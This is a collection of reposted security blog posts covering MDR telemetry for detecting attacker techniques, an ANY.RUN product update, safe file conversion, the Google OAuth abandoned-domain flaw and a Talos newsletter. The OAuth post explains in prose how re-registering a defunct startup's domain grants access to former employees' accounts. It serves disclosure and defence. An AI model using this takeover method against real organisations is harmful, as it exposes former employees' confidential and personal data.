To effectively counter cyberthreats that circumvent basic security measures, a managed detection and response (MDR) service must ensure the right data collection tools are in place in the protected organization from the start. In addition, the service team and the client team should regularly discuss how to improve telemetry collection, and what other data should be collected in order to stay ahead of evolving attacker tactics. Our experts not only advise clients on proper data collection, but also closely monitor the changing threat landscape to continuously refine the process. Our latest MDR service report details incidents in client infrastructures and the tactics attackers have used. A dedicated section of the report covers the most frequently triggered detection rules in 2024, and what’s required for them to function effectively.
Dumping registry hives
Among the suspicious operations frequently detected in high-severity incidents, the most common by far is the extraction of security-critical data from the system registry (dumping of sensitive registry hives). This activity was observed in 27% of high-severity incidents.
To detect such extraction, the MDR provider must have telemetry from an EDR system installed on all computers and servers in the protected organization. If there’s an endpoint protection system (EPP) that can detect suspicious (not necessarily malicious) activity, this can also serve as a source of the necessary data. An event that most definitely should be logged is registry access.
Malicious code in memory
Many attacks occur in such a way that malicious files are never stored on the hard drive. However, an endpoint protection system can detect malicious code in the memory of a system process or another memory segment. This occurred in 17% of high-severity incidents, and such events from the EPP must be instantly visible to the MDR service.
Suspicious services
The creation and execution of Windows services containing suspicious arbitrary code is a strong indicator of an unfolding cyberattack. This was also detected in nearly 17% of high-severity incidents. To detect this activity, telemetry must include OS system events, process launch information, and the complete contents of all startup lists.
Access to a malicious host
Though seemingly simple, this event appeared in 12% of high-severity incidents, and requires an up-to-date IP reputation database for detection. In a company’s infrastructure, access attempts can be tracked in multiple ways: EPP detection, network-level monitoring, and DNS/HTTP request analysis. The MDR provider can also use threat intelligence databases to enrich the client’s telemetry.
Memory fragment dumps
To escalate an attack within a victim’s network after the initial compromise, attackers often try to obtain credentials on an infected machine. If they get lucky, these may be network administrator credentials, allowing them to quickly take over servers. A classic technique for achieving this is extracting and saving memory fragments related to the LSASS (Local Security Authority Subsystem Service). In 2024, we detected this technique in nearly 12% of high-severity incidents.
Attempts to capture LSASS memory can be detected in multiple ways: using certain EPP and EDR rules, analyzing command-line parameters when launching applications, scripts and processes, and monitoring access to LSASS.
Executing a low-reputation object
Although a file, script, or document may not be definitively malicious, if it was previously observed in suspicious activity, MDR specialists must check whether a cyberattack is underway. This requires telemetry that logs processes launching suspicious files. And, of course, threat intelligence is needed to flag the file’s bad reputation. Execution of low-reputation objects was observed in 10% of high-severity incidents.
Adding privileged users
Beyond stealing administrator accounts, attackers often create their own accounts and then elevate their privileges. In 9% of high-severity incidents, an account was added to a privileged corporate domain group. To detect this, OS event collection must capture all account modifications.
Remote process execution
In over 5% of incidents, there was a process involved that was launched by a remote user. To monitor such events, computers must log process launch events and the loading of executable file sections into memory.
Malicious address in event parameters
In any event-parameters — but most commonly in the command line of the running process — a known malicious URL may appear. This was observed in nearly 5% of high-severity incidents, making it crucial to always include detailed parameters of logged events, including the full command line, in the telemetry. For MDR providers, such detection is only possible with access to a large URL-reputation database (which we, of course, have).
Telemetry sources
Above, we’ve highlighted the most critical events that help an MDR team detect and prevent serious incidents. The full report covers additional events and a deeper analysis of attacker tactics. The list above makes it clear what types of data must be transmitted to an MDR service in real time for it to work effectively. First and foremost, this includes:
Telemetry from endpoint protection solutions (EPP) or EDR agents. In today’s organizations, traditional “antivirus” and detection and response tools are often integrated into a single product. This provides key telemetry from computers and servers, so its presence is essential on all machines, along with the configuration of detailed event logging in collaboration with the MDR team.
OS events. Properly configured Windows logs provide critical information about account manipulations, process launches and terminations, and more. On Linux systems, the same role is played by Audit Daemon (aka auditd). Special attention must be given to configuring logging on all of the organization’s servers. Detailed recommendations for settings for Windows can be found in our knowledge base. The Sysmon tool from the Microsoft Sysinternals suite enhances the effectiveness of Windows logs.
Events from network devices. It’s critical to configure detailed logging on network devices — primarily firewalls and web filters, but also routers, proxies, and DNS servers if used in the company.
Cloud environment logs. Attackers frequently compromise cloud infrastructure and SaaS tools, where the previously mentioned logs are typically not available. Therefore, it’s essential to set up comprehensive security-focused logging using cloud-native tools, such as AWS CloudTrail.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-03-04 17:06:452025-03-04 17:06:45What to collect on computers for monitoring complex threats
February brought major enhancements to ANY.RUN, improving threat intelligence, detection capabilities, and overall user experience.
With the launch of Threat Intelligence Reports, security professionals now have access to detailed, expert-driven analyses of cyber threats, malware, and APT activities.
We also introduced a redesigned website, making navigation more intuitive and structured.
On the detection side, we significantly improved our threat-hunting capabilities, adding 314 new Suricata rules, refining behavior signatures, and expanding our YARA rule database. These updates strengthen real-time threat visibility and detection accuracy, helping analysts respond faster to emerging cyber threats.
Let’s take a closer look at February’s updates and how they enhance your malware-hunting workflow.
Product Updates
Threat Intelligence Reports
In February, ANY.RUN introduced Threat Intelligence Reports in TI Lookup: detailed research on cyber threats, providing security professionals and decision-makers with actionable insights.
Curated by our experts, these reports support threat monitoring, incident response, R&D, and strategic planning, covering malware, ransomware, phishing campaigns, and APTs.
Built on real-world threat data, sources include our Interactive Sandbox, TI Lookup, and community-driven malware analyses.
Each report provides a detailed threat overview, covering key aspects such as:
Threat actor or malware profile: Origins, objectives, targeted industries, and regions.
TTPs: Methods used by attackers, helping in detection and mitigation.
IOCs, IOBs, IOAs: Critical data for identifying threats in your environment.
YARA and SIGMA rules: Ready-to-use detection rules for security systems.
Sandbox analysis links: Direct access to real-world threat samples in action.
Additional references: Supporting research and external resources for deeper insights.
New Website Design: A More User-Friendly Experience
In February, we introduced a redesigned ANY.RUN website, making it more intuitive, structured, and easier to navigate. The new design makes sure that all essential cybersecurity resources and solutions are now better organized and easily accessible.
The new redesigned webpage of ANY.RUN
Whether you’re exploring threat intelligence, running sandbox analyses, or researching cybersecurity insights, the updated layout enhances usability for both security experts and new users.
Threat Coverage Updates
Suricata Rules
In February, we added 314 new Suricata rules, strengthening our network-based threat detection. Notable updates include:
A Booking.com phishing rule, designed to detect fraudulent activity targeting users.
A rule for Australia Gov phishing attempts, though it covers only partial cases due to dynamic URL changes and regional access restrictions.
New Behavior Signatures
This month, we expanded behavior-based detection, adding new mutex findings, threat detections, and suspicious activity signatures. These updates improve the ability to track malware persistence mechanisms and evasive techniques in real-time.
Various software-related mutex detections, including COYOTE mutex, Proxifier, Wireshark, Java, Adguardvpn, Cheatengine, Opera, Electron Js, Adobeinstaller, Hotbar, Quickdriverupdater, And Pcappstore
New YARA Rule Updates
In February, we expanded our YARA rule database, enhancing malware detection and classification. The latest rules target a variety of stealers, RATs, ransomware, and loaders, improving detection accuracy for emerging threats.
Discover all features of the Enterprise plan designed for businesses and large security teams.
See details
About ANY.RUN
ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search, and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.
You almost certainly know the situation when a friend or colleague sends you files in a format you can’t open. For example, you asked for photos, expecting JPEGs or PNGs, but instead they arrive in HEIC format. What do most people do in this case? That’s right, they look for a free online file-converter.
If you’re a long-time reader of our Kaspersky Daily blog, you probably already know that the most popular method of doing most anything is hardly ever the safest. File conversion is no different. Let’s figure out together what threats are lurking inside free online-converters, and find out how to change file format safely.
Why is this important? Because converting a file is not simply a matter of changing its extension — otherwise you could just rename the file from, say, EPUB to MP3. Instead, the converter program must read the file, understand what it contains, convert the data and re-save it in a different format — and each of these stages poses its own threats.
Personal data leakage, malware, and other threats
The first risk that springs to mind is personal data leakage. Even if you’re a “who on earth needs my data?” kind of person, you should still take care: your vacation snaps may be of no use to anyone, but confidential work documents are a different kettle of fish. When you upload a file to an online converter, you can never be sure that the site won’t save a copy of your file for its own purposes. Uploaded data can easily end up in the hands of scammers, and even be used to launch an attack on your company. And if you get fingered as the intruders’ entry point into the corporate network, your infosec team will hardly be thanking you.
Another common risk is malware infection. Some dubious converter sites may modify your files or add malicious code to the converted file — and without reliable protection you won’t know about it until it’s too late. The converted files may contain scripts, Trojans, macros, and other nasty stuff we’ve covered in detail many times.
Converter sites may also be phishing, so services asking you to register, enter a load of personal data, and buy a subscription just to convert a file from, say, PDF to DOC, should be eyed with suspicion. If you still plan to use an online converter, look for one that doesn’t require registration, and never give it your payment details.
How to convert files locally
The safest way is to convert files locally; that is, on your own device without using third-party sites. This way, the data is guaranteed to remain confidential — at least until you connect to the internet. You can change a file’s format using either system tools or popular programs.
For text and spreadsheet files, as well as presentations, Microsoft Office can help. It can read many file formats using the File → Open or File → Import commands (depending on the version of Office and the operating system), and save them in different formats using the File→Save as→ Save as type (or File format) or File → Export commands. The list of available formats is long: from PDF and HTML to the OpenDocument standard.
If you don’t have access to Microsoft products, you can use the free alternatives LibreOffice and OpenOffice, which also support various text and table file formats. On Windows, text documents can also be converted in a built-in WordPad editor, although it reads far fewer file types.
For macOS users, Apple’s office applications (Pages, Numbers, Keynote) recognize and save documents in many different formats.
As for graphics files, things are even simpler. Built-in operating-system tools can help convert images from PNG to JPEG. On Windows, just use this command in Paint: File→Save as. macOS users don’t even need to open any programs — just right-click the image in Finder and select Quick Actions → Convert Image. The window that opens gives you a choice of format (PNG, JPEG, HEIF) and converted image size.
If the above conversion options aren’t enough — for example, you’re handling audio/video files or specific file formats — look for offline tools with a solid reputation as free and open-source software (FOSS).
For video (and many audio) formats, check out Handbrake (Windows, macOS, Linux) and Shutter Encoder (Windows, macOS, Linux); for audio, try Audacity, and for images, ImageMagick (Windows, macOS, Linux).
Most multimedia converters simply add a graphical interface to FFmpeg, perhaps the top tool for converting multimedia formats. Its only drawback (which for some is a plus) is that it only works from the command line.
If you’re fine with the command line, FFmpeg is the obvious choice (but, being fine, you’ve probably got it installed already). Another great choice for command line fans is Pandoc — a versatile converter of text and markup formats. Incidentally, under Extras on the Pandoc website, you can find many third-party utilities for adding a graphical interface to this converter, or embedding it in other editors, services, or even operating systems.
All of the above converters are FOSS (free and open-source software), and support at least the most popular operating systems: Windows, macOS, Linux.
When choosing other offline converters, make sure that the conversion really does take place locally — many tools simply provide an interface to online converters and still send your source files to a server. This is very easy to check by disconnecting from the internet before converting. If the tool doesn’t work, it’s not an offline converter.
How to convert files online as safely as possible
Sometimes there’s no avoiding online converters — for example, you were sent a file in some highly exotic or outdated format. The next section looks at how to minimize threats when converting files online.
Alas, it’s impossible to guarantee confidentiality when using an online converter. Its creators can write whatever they want in the site’s policies, but you’ll never know what actually happens to your uploaded data. Therefore, the golden rule is: never convert sensitive information online.
If you have a Google account (and who doesn’t?), you can upload the file you want to convert to Google Drive (most office formats are accepted), right-click, and open it in Google Docs/Sheets/Slides, then download it in a different format. Among the pluses, this method also works on mobile devices — although in this case it’s more convenient to open the file in the relevant Google editing tool.
Another fairly safe way to convert either text or graphics files is Adobe’s online converter. You can even use it for free on a smartphone — but there’s a catch: all uploaded data gets stored on Adobe’s servers, making this method unsuitable for confidential files.
Follow these rules to ensure maximum safety when converting files online:
Use reputable online converters.
Open the converter site in a new browser window in Incognito mode; this will reduce the amount of information collected about you — but not down to zero.
Use a reliable VPN to hide your real IP address from the converter site.
Review the online converter’s privacy policy to understand how your data will be handled. Make sure the service does not collect, store, or transfer information without your consent — or at least claims not to.
Check that the files for conversion do not contain confidential information.
Scan the converted files with an antivirus. Be very wary if the converter site wants you to download the result in an archive — especially a password-protected one, since this is the most common way to conceal a virus from security software. If you don’t have any protection software on your device (heaven forbid), you can scan the downloaded file using our online file checker.
Avoid unverified sites that require registration and payment details.
Unzip this
Lastly, a small life-hack that few people know about. Sometimes you don’t need to convert a file to another format at all, but just extract information from it; for example — pull images out of a text document or presentation in their original format. Doing this even with native editors is usually time-consuming and inconvenient — you have to export the images one by one, and the editors might change their size or compress them, deteriorating the picture quality.
But there’s a way round this. The secret is that files of many formats are nothing more than a compressed folder with subfolders that store “pieces of the puzzle”: text, images, embedded videos, and the like. And it’s all zipped. That means that almost all office-suite files are ZIPs with the extension changed to DOCX, PPTX, PAGES, etc.
To extract all the contents from this “archive”, you simply need to rename the file, changing its extension to ZIP, and then unzip it. The result will be a folder with subfolders in which all the “ingredients” of the original document are neatly laid out.
So, if you come across an unknown file format, first of all scan it for viruses with a reliable security solution, then make a copy of it, change the extension to ZIP (in macOS, if the file extension is hidden, you may need to press ⌘+I to change it), and try to unzip the file — in many cases this will work. Next, have a rummage around in the resulting folder — you’ll find all sorts of goodies!
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-03-03 12:07:132025-03-03 12:07:13How to safely convert files | Kaspersky official blog
Just over a year ago, in our post entitled Google OAuth and phantom accounts, we discussed how using the “Sign in with Google” option for corporate services allows employees to create phantom Google accounts that aren’t controlled by the corporate Google Workspace admin, and continue to function after offboarding. Recently, it was discovered that this isn’t the only issue with OAuth. Due to weaknesses in this authentication mechanism, anyone can gain access to data of many defunct organizations by re-registering domains they abandoned. In this article, we explore this attack in more detail.
How authentication works with “Sign in with Google”
Some organizations may believe that “Sign in with Google” provides a reliable authentication mechanism backed by Google’s advanced technology and vast user monitoring capabilities. However, in reality, the Google OAuth authentication check is quite basic. It generally comes down to verifying that a user has access to an email address linked to an organization’s Google Workspace.
Moreover, as mentioned in our previous article on Google OAuth, this doesn’t necessarily have to be a Gmail address — Google accounts can be linked to any email address. Therefore, the security of accessing a corporate service via “Sign in with Google” is only as strong as the security of the email linked to the Google account.
Now let’s get into the details…
When authenticating a user in a corporate service, Google OAuth sends the following information to that service:
In theory, the Google OAuth ID token includes a unique parameter called sub for each Google account. However, in practice, due to issues with its usage, services often only check the domain and email address. Source
Google recommends that services use the sub parameter, claiming that this identifier is unique and constant for the user account — unlike an email address. But in reality, the sub parameter isn’t always constant; for a small number of users, it changes over time, which can cause authentication failures. As a result, services tend not to use it, and instead verify only the domain and email address — contrary to Google’s recommendations.
“Sign in with Google” using an abandoned domain
Thus, an attacker can gain unauthorized access to a company’s services by simply having access to an email within that company’s domain. This is particularly easy to do if the company has ceased operations and abandoned its domain: anyone can register it for themselves.
The attacker can then create any email address under this domain, and use it to log into one of the services the company likely used. Some of these services may display a list of real users linked to the organization’s workspace — even if the address entered by the attacker was never actually used.
With this list — and complete control over all email addresses within the abandoned domain — the attacker can reconstruct the original Google Workspace of the defunct company. In this way, attackers can gain access to the profiles of former employees in services that used Google OAuth for authentication.
How serious a problem is this?
Dylan Ayrey, the researcher who discovered this Google OAuth vulnerability (and the previous issue with phantom accounts), aimed to demonstrate the severity of potential consequences. Using data from Crunchbase, Ayrey compiled a list of over 100,000 terminated startups whose domains are now up for sale.
Ayrey purchased one of these abandoned domains and tested the feasibility of the attack. Among the corporate services he managed to access using this vulnerability were Slack, Zoom, Notion, ChatGPT, and HR systems.
Thus, with this relatively simple attack requiring minimal resources, an attacker can gain access to a wealth of confidential information, ranging from employee correspondence and notes to personal data from HR systems.
According to Ayrey’s estimates, around 50% of startups use Google Workspace. If we suppose that the average defunct startup had about 10 employees, we could be talking about hundreds of thousands of people and millions of vulnerable accounts.
Who’s responsible, and what can be done?
Ayrey dutifully notified Google of this vulnerability through its bug bounty program. He also suggested a long-term solution: creating truly permanent and unique identifiers for Google accounts and Google Workspace. However, his report was initially rejected, with the comment “no fix needed” and labeled as “fraud or abuse”!
However, a few months after Ayrey presented his findings at a hacker conference (!) the report was reopened, and he was awarded $1337. Notably, he received the same minimal reward for his previous discovery of the phantom Google accounts vulnerability.
According to Ayrey, Google promised to fix the vulnerability in Google OAuth, but didn’t specify when or how exactly they plan to do this. Therefore, the problem with the “Sign in with Google” mechanism remains an unresolved issue, for which no one is willing to take responsibility. Potential victims of this attack include former employees of defunct companies who no longer have control over their accounts. Worse still, there’s no one to hold accountable for the security of these accounts anymore.
The wise move here would be for companies to take preventive measures in advance. However, very few startups seriously plan for their own demise — let alone what will happen afterward.
Fortunately, defending against this Google OAuth vulnerability is relatively straightforward. There are two non-mutually exclusive options:
Use a traditional login-and-password combo instead of “Sign in with Google”, and always enable two-factor authentication.
If your company ceases operations, don’t abandon workspaces in corporate services; delete them instead. This is quite easy to do; for example, here are the instructions for Slack and Notion.
Welcome to this week’s edition of the Threat Source newsletter.
Hello again my friends! Geez, it’s been a year am I right? Lemons its February you say?! Oof.
Imposter syndrome. You’ve heard the term I’m sure, but what is it? Basically: imposter syndrome is the persistent feeling of self-doubt and fear of being exposed as a fraud despite clear evidence of competence and success. In cybersecurity, and in especially in Talos, you will find imposter syndrome in abundance.
In Talos you’re in rooms of incredibly bright and smart people. They are paragons of what it is to be hackers, and you cannot help but often admire the amazing quality of their work. It is truly an amazing team that does important work to help save the world from the bad guys.
The downside? You’re in a room of bright and smart people. Some can reverse malware binaries while juggling chainsaws. Some are polyglots who can at length tell you the linguistic nuances of Mesopotamian verbs and loanwords and have eidetic memory of every ransomware cartel ever. I personally know one is an amazing, accredited musician and actually hacked a prison to open its jail cells on a pentest.
How do you not compare yourself to the talents, skills, and achievements of wonderfully smart and talented people? It’s tough not to. Comparison is truly the thief of joy.
The truth is – in cybersecurity and in places like Talos and elsewhere, you will be constantly assailing yourself with self-doubt of achievement and belonging. The anxiety, stress, and burnout from imposter syndrome are a real thig.
So what do we do? First, look at your achievements. You are where you are because others saw value in your work. Second, challenge those negative self-thoughts. Easier said than done, I know, but hear me out. Use mentors and peer group support to help challenge those negative self-thoughts.
And lastly, be kind to yourself. Cybersecurity is a hard gig. It’s a gigantic amount of technical and non-technical information and we all feel the pressure to absorb, understand, and master it and all its nuances. That’s not possible of course, but we cyber folks are wired differently. If you can walk away with 1% more information than you had yesterday, that’s a win. Take it. Just be kind to yourself, ok?
I want to take a moment to address a specific audience of readers. All the U.S. federal workers who have been affected by reduction in force (RIFs), my heart goes out to you. This is an unearned hardship. I wish I had a magic wand to wave to alleviate the stress and trauma of a sudden event like this. I know it’s truly awful. If I can offer any guidance or mentorship for private sector cybersecurity, reach out. I may not have all the answers, but I will do what I can. Stay strong.
The one big thing
Boy howdy is this a big one – scams! Look, the average person isn’t going to get smoked by Salt/Volt Typhoon, or wrestle with a financial threat actor like a ransomware cartel. But you absolutely have bought and sold things online. We break down seller abuse – that is, ways to trick sellers into be defrauded out of money. We always picture scams as the seller doing the defrauding, but the reverse is just as true.
Why do I care?
You want to keep money in your pocket, and not be the victim of a scam. They adversaries here know the systems they are manipulating quite well here and have fine tuned the art of fraud. It’s important to understand the seller experience as much as the buyer experience in order understand these kinds of frauds and thefts.
So now what?
Understand the threat landscape for seller/buyer fraud, and hopefully this work can help keep money in your pocket and not a victim of theft. Pay attention to URL’s you’re asked to click, and clever re-directs to scamming websites. Now you know. And as G.I. Joe said – knowing is half the battle.
Top security headlines of the week
Sensitive financial and health data belonging to millions of veterans and stored on a benefits website is at risk of being stolen or otherwise compromised, according to a federal employee tasked with cybersecurity who was recently fired as part of massive government-wide cuts. (AP News)
Attackers are wielding a novel Linux backdoor against the education and public sectors in the US and Asia that demonstrates particularly stealthy ways to avoid both detection and as well as deletion from a system. (Dark Reading)
Hackers claim to have published a trove of sensitive data belonging to IVF patients after a cyberattack on Genea, one of Australia’s largest fertility providers. (Tech Crunch)
A blueprint for protecting major events – Yuri Kramarz joins Talos Takes to discuss his experience in cybersecurity and threat hunting for some of the world’s biggest sporting events.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-02-27 19:06:432025-02-27 19:06:43Sellers can get scammed too, and Joe goes off on a rant about imposter syndrome